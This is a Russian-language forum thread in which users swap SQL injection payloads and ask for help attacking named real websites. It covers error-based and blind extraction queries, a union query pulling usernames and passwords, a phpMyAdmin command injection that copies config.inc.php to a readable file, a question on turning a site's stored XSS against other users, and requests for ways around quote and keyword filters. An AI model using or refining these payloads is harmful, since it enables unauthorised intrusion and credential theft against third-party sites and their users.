1 or 1=(select Val collate Cyrillic_General_CI_AS top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama')) мб Val ненужен, и мб перед from поставить, сгуглил просто. http://www.sql.ru/forum/actualthread.aspx?tid=415606
Благодарю, я видел эту тему. Все равно это не решает вопроса с кодировкой, ну и ладно. Видать, встроенными функциями этого не сделать. Пробовал уже и множество чаров, но нет. Скуль - боян, но интересно, как его раскрутили пару лет назад.
Есть сайт http://live-cs.ru/, на нем при установке статуса в профиле(http://live-cs.ru/people/Medic/ например) срабатывает введенный код, как это можно использовать, чтобы какой-нибудь другой юзер выполнил действие кода?
2LokbatanLi c чего ты взял что там скуля? нет результата... вопрос site?indwx.php?keyword=1' никак не обойти? заменять ' на %27 пробовал
плз подскажыте по посту #11976 я пока только учусь и эта "задачка" ну просто рвет мне мозг, не давая покоя.
phpmyadmin при запросе.. site.com/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by="]); OR exec('cp $(pwd)"/config.inc.php" config.txt'); &sort_order=desc&token=.... На сколько я понял в документации стоит специальная ошибка (или не стоит ).. но исправив её всё-равно не работает. Тестирую на версии 2.11.8.1 Выбивает ошибку. получается фильтруется переменная sort_by? Или может я где накосячил?
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)--+ нету там доступа к файлам так датадир это домашняя дира самого мускула, кстате еслиб была возможность читать файлы можно было бы слить сразу инфу всю с таблиц если буфер позволит) а то что при ошибки это директория самого сайта видная из веба
решил разобратся с логикой запроса от warlok'a прочитал статью квазара что не так? и почему не прокатывает http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1))a)--+
дело в этом: union SELECT concat_ws(0x3a,user,password)+FROM user LIMIT 0,1--+ перебор лимитом: 0,1 1,1 2,1 и т.д.
Code: http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from+(select+count(0),concat((select+user()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
чёт не могу втыкнуть в этот запрос совсем, не могли бы обьяснить или сылку дать просто в других иньекциях не пашет
нужна помощь: в скрипте стоит защита такого плана. Насколько я понял, ищется вхождение слов from и union в запрос(ну вернее в id). Если они есть, то сервер выдаёт error с мылом web-мастера. Как можно обойти это дело? FrOm не подходит
http://www.gtbit.org/news/viewitem.php?id=37 ещё в чём фишка: если так Code: http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))=53 то страница Not Acceptable а если Code: http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123+from+123),1,1))=53 то Internal Server Error Довольно странно, получается что запрос выполняется
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода PHP: $id=$_GET['id']; $id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi if (strstr('from',$id)>0) showerror; как такое обойти?
карочи я вообще задолбался раскрутит эту скул: никак не могу обходит фильтр кавычки, всё перепробовал может кто посоветует обход
